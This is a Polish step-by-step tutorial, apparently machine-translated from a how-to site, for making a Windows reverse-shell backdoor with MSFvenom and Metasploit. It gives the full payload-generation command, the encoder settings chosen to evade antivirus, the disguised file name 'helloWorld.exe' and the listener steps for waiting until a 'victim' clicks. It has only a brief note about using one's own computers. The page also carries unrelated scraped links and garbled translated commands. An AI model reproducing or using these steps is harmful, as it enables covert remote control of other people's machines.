Jak stworzyć prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux?

Wideo: Jak stworzyć prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux?

Wideo: Top 5 TH 8 Attack Strategies WITHOUT Clan Castle Troops (Clash of Clans) 2024, Może

2024 Autor: Gilbert Ryder | [email protected]. Ostatnio zmodyfikowany: 2023-12-16 17:39

Backdoor służy do omijania mechanizmów bezpieczeństwa, często potajemnie i przeważnie w sposób niewykrywalny. Używając MSFvenom, kombinacji msfpayload i msfencode, możliwe jest stworzenie backdoora, który łączy się z napastnikiem za pomocą TCP odwróconej powłoki. Aby stworzyć backdoora, musisz zmienić sygnaturę swojego złośliwego oprogramowania, aby uniknąć oprogramowania antywirusowego. Ukończ ten projekt na parze komputerów, do których masz uprawnienia dostępu, a dzięki temu dowiesz się więcej o bezpieczeństwie komputera i działaniu tego rodzaju backdoora.

Kroki

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 1

Krok 1. Uruchom Kali i uruchom konsolę Terminal

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 2

Krok 2. Wpisz ifconfig, aby wyświetlić interfejs i sprawdź swój adres IP

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 3

Krok 3. Wpisz msfvenom -l kodery, aby wyświetlić listę koderów

Jako kodera użyjesz x86/shikata_ga_nai

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 4

Krok 4. Wpisz "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe

-a x86 --platform windows wyznacza architekturę do użycia.
-p windows/shell/reverse_tcp wyznacza ładunki do osadzenia.
LHOST wyznacza adres IP słuchacza.
LPORT oznacza port nasłuchiwania.
-b "\x00" oznacza unikanie złego znaku (bajty null).
-e x86/shikata_ga_nai wyznacza nazwę kodera.
-f exe > helloWorld.exe oznacza wyjście formatu.

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 5

Krok 5. Wpisz msfconsole, aby aktywować Metasploit

Teraz wygenerowałeś backdoora. Kiedy ofiara kliknie helloWorld.exe, osadzony ładunek powłoki zostanie aktywowany i nawiąże połączenie z powrotem do twojego systemu. Aby otrzymać połączenie, musisz otworzyć multi-handler w Metasploit i ustawić ładunki

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 6

Krok 6. Wpisz use exploit/multi/handler

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 7

Krok 7. Wpisz set payload windows/shell/reverse_tcp

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 8

Krok 8. Wpisz opcje show, aby sprawdzić moduł

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 9

Krok 9. Wpisz zestaw LHOST 192.168.48.129

„LHOST” oznacza adres IP słuchacza

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 10

Krok 10. Typ zestawu LPORT 4444

„LPORT” oznacza port nasłuchiwania

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 11

Krok 11. Wpisz run i poczekaj na połączenie z komputera ofiary

Utwórz prawie niewykrywalny backdoor za pomocą MSFvenom w Kali Linux Krok 12

Krok 12. Poczekaj, aż ofiara kliknie helloWorld.exe

Następnie zostaniesz pomyślnie połączony z komputerem ofiary.

Porady

Użycie -i w MSFvenom będzie reprezentować iteracje kodowania. Czasami więcej iteracji może pomóc ominąć oprogramowanie AV.
Nauczyłeś się, jak generować backdoora i kodować go za pomocą MSFvenom, ale ta metoda nie będzie działać idealnie w dzisiejszych czasach w przypadku niektórych programów antywirusowych. Powodem tego są szablony wykonania w MSFvenom. Sprzedawcy AV dodali statyczny podpis tych szablonów i po prostu ich poszukaj. Rozwiązaniem tego problemu jest użycie innego szablonu wykonania lub innych narzędzi.

Zalecana:

Jak stworzyć ulotkę za pomocą Microsoft Publisher: 11 kroków

Ulotki mogą być przydatne do rozpowszechniania informacji, zwracania uwagi na specjalne oferty lub wyprzedaże, ostrzegania ludzi o zbiórkach funduszy lub innych wydarzeniach lub po prostu do ogłaszania specjalnych ogłoszeń. Microsoft Publisher umożliwia tworzenie ulotek do dowolnego z tych celów przy użyciu wbudowanych szablonów lub od podstaw, a także dostosowywanie ulotek za pomocą specjalnych odrywek w celu wygenerowania odpowiedzi od potencjalnych klientów.

3 sposoby zmiany adresu w prawie jazdy w stanie Illinois

Prawo stanu Illinois wymaga, aby wszyscy kierowcy powiadamiali biuro Sekretarza Stanu Illinois o każdej zmianie adresu w ciągu 10 dni od zmiany adresu danej osoby. Możesz zaktualizować swój adres online, osobiście lub pocztą. Większość kierowców nie jest prawnie zobowiązana do uzyskania poprawionego prawa jazdy, które odzwierciedla jego nowy adres.

Jak stworzyć grę, która chce zostać milionerem za pomocą programu PowerPoint

Być może widziałeś lub słyszałeś o teleturnieju Kto chce zostać milionerem. Wierz lub nie, ale możesz stworzyć własną wersję gry z własnymi pytaniami i odpowiedziami, używając tylko prostej wersji programu Microsoft PowerPoint! Kroki Krok 1.

Jak korzystać z prawie każdej kamery filmowej 35 mm: 12 kroków (ze zdjęciami)

W dobie aparatów cyfrowych może wydawać się dziwne instruowanie Cię, jak korzystać z „przestarzałych” aparatów 35 mm. Mimo to jest wielu ludzi, którzy decydują się na kręcenie filmów z powodów artystycznych (i nie tylko). A ponieważ cyfry pochłaniają udział w rynku prawie wszystkiego oprócz fotografii krajobrazowej, niesamowity sprzęt 35 mm jest tańszy niż kiedykolwiek.

3 sposoby na zmianę nazwiska na teksańskim prawie jazdy

Twoje prawo jazdy w Teksasie jest oficjalną formą identyfikacji osobistej. Z tego powodu powinna dokładnie odzwierciedlać Twoje obecne imię i nazwisko. Zbierz dokumentację pomocniczą i odwiedź najbliższe biuro Departamentu Bezpieczeństwa Publicznego (DPS).